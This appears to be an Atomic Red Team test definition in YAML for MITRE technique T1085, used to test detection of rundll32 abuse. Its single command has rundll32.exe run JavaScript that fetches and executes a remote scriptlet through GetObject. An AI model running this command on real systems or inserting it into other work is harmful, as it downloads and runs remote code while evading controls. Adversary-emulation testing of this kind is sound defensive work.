Brian Beyer
18 lines
604 B
YAML
18 lines
604 B
YAML
attack_technique: T1085
|
|
display_name: Rundll32
|
|
atomic_tests:
|
|
- name: Rundll32 execute JavaScript Remote Payload With GetObject
|
|
description: |
|
|
Test execution of a remote script using rundll32.exe
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
file_url:
|
|
description: location of the payload
|
|
type: Url
|
|
default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"
|